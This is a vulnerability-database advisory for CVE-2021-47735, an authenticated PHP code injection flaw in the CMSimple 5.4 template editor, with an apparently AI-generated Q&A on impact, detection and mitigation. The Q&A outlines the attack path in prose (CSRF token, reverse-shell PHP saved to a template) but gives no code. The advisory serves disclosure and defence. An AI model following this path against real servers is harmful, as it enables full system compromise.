CVE-2021-47735
Authenticated Remote Code Execution in CMSimple 5.4 Template Editor
Publication date: 2025-12-23
Last updated on: 2025-12-23
Assigner: VulnCheck
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| cmsimple | cmsimple | 5.4 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-94 | The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2021-47735 is an authenticated remote code execution vulnerability in CMSimple version 5.4. It allows an attacker who has valid login credentials to inject malicious PHP code into template files via the template editing functionality. The attacker must obtain a valid CSRF token to save a crafted payload, such as a reverse shell, through the template editing endpoint. Once the malicious code is saved, it can be executed by accessing the CMSimple application, leading to remote code execution on the server. [1, 2]
How can this vulnerability impact me? :
This vulnerability can lead to full system compromise. An authenticated attacker can execute arbitrary commands on the server by injecting PHP code into template files, potentially gaining control over the affected system. This can result in unauthorized access, data theft, service disruption, or further attacks launched from the compromised server. [1, 2]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by monitoring for authenticated POST requests to the template editing endpoint that include PHP code injection attempts. One approach is to check web server logs for POST requests to the template save action containing suspicious PHP code, especially code using exec() or reverse shell commands. Additionally, you can attempt to log in with valid credentials and inspect the template editing page for unexpected changes or injected PHP code. Since the exploit involves sending POST requests with a valid CSRF token, automated scripts can be used to detect abnormal template modifications. Specific commands are not provided, but reviewing web server access logs (e.g., using grep for POST requests to template endpoints) and scanning template files for injected PHP code can help detect exploitation attempts. [1]
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include restricting access to the template editing functionality to only highly trusted users, ensuring strong authentication and session management to prevent unauthorized access, and monitoring for suspicious activity related to template file modifications. Applying any available patches or updates from CMSimple is recommended. Additionally, disabling or restricting the ability to inject PHP code via the template editor, if possible, can reduce risk. Implementing Web Application Firewall (WAF) rules to detect and block malicious POST requests containing PHP code payloads targeting the template editing endpoint can also help mitigate exploitation. [2]